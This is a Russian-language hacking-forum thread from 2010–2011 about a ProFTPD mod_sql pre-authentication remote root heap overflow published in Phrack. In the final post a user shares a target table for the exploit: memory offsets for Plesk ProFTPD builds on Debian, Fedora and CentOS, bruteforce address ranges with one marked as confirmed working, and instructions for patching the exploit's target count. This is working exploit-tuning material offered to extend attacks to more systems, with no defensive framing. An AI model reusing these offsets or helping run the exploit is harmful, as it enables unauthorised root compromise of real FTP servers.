Старый 18.11.2010, 11:21   #11
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

В новом Phrack выложили 0day: ProFTPD with mod_sql pre-authentication remote root heap overflow
SynQ вне форума   Ответить с цитированием
Старый 20.11.2010, 06:06   #12
AloneKiller
 
Аватар для AloneKiller
 
Регистрация: 04.10.2010
Сообщений: 79
Репутация: 0
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
В новом Phrack выложили 0day: ProFTPD with mod_sql pre-authentication remote root heap overflow
А можно ссылку?
AloneKiller вне форума   Ответить с цитированием
Старый 20.11.2010, 07:27   #13
BlackFan
 
Аватар для BlackFan
 
Регистрация: 08.07.2010
Сообщений: 354
Репутация: 402
По умолчанию

Цитата:
Сообщение от AloneKiller Посмотреть сообщение
А можно ссылку?
http://www.phrack.org/issues.html?issue=67&id=7#article
BlackFan вне форума   Ответить с цитированием
Старый 15.12.2010, 19:01   #14
Acez666
 
Аватар для Acez666
 
Регистрация: 13.12.2010
Сообщений: 10
Репутация: 1
По умолчанию

они там типо рутят 1.3.1 ?
Acez666 вне форума   Ответить с цитированием
Старый 27.02.2011, 12:38   #15
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Нашел версию эксплойта с несколькими новыми оффсетами для некоторых систем, может пригодятся:

Цитата:
["ProFTPD 1.3.2b Debian 4 (Plesk binary)", "Linux",
1,0x0804c920,8189,0],
["ProFTPD 1.3.2b Debian 5 (Plesk binary)", "Linux",
1,0x0804cc60,8189,0],
["ProFTPD 1.3.2e Fedora 11 (Plesk binary)", "Linux",
1,0x0804c2ec,8189,0],
["ProFTPD 1.3.2e Fedora 7 (Plesk binary)", "Linux",
1,0x0804c208,8189,0],
["ProFTPD 1.3.2e Fedora 8 (Plesk binary)", "Linux",
1,0x0804c258,8189,0],
["ProFTPD 1.3.3 Debian 4 (Plesk binary)", "Linux",
1,0x0804ce4c,4101,0],
["ProFTPD 1.3.3 CentOS 4 (Plesk binary)", "Linux",
1,0x0804ced0,4101,0],
["ProFTPD 1.3.3 CentOS 5 (Plesk binary)", "Linux",
1,0x0804c72c,4101,0],
["bruteforce 8189",# PLATFORM SPEC
"Linux", # OPERATING SYSTEM
1, # EXPLOIT STYLE
0x0804A000, # OFFSET START # OFFSET END
8189,
0,
0x0804D000], # ALIGN

#Confirmed to work
["Bruteforce 4101",
"Linux",
1,
0x0804A000,
4101,
0,
0x0804D000],

#
["ProFTPD 1.3.2e CentOS 5 (Distro binary)", "Linux",
1,0x0804A234,4101,12], #not working?
После добавки нужно изменить $numtargets с 13 на 24.
SynQ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot